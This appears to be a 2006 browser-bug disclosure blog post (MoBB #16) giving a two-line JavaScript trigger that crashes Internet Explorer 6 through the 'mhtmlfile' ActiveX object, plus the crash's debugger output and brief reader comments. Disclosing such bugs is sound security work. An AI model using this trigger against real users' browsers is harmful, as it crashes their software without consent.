Sunday, July 16, 2006

MoBB #16: MHTMLFile Location

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.

var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";

Demonstration

eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference

posted by hdm @ 1:18 AM   3 comments links to this post

3 Comments:

At 10:58 PM, Blogger error27 said...

Call me crazy if you will, but I'm beginning to think this ActiveX stuff might have been a mistake.

 
At 7:53 AM, Anonymous Anonymous said...

The mistake that just keeps granted root privileges...

 
At 7:53 AM, Anonymous Anonymous said...

The mistake that just keeps granted root privileges...

 

Post a Comment

Links to this post:

Create a Link

<< Home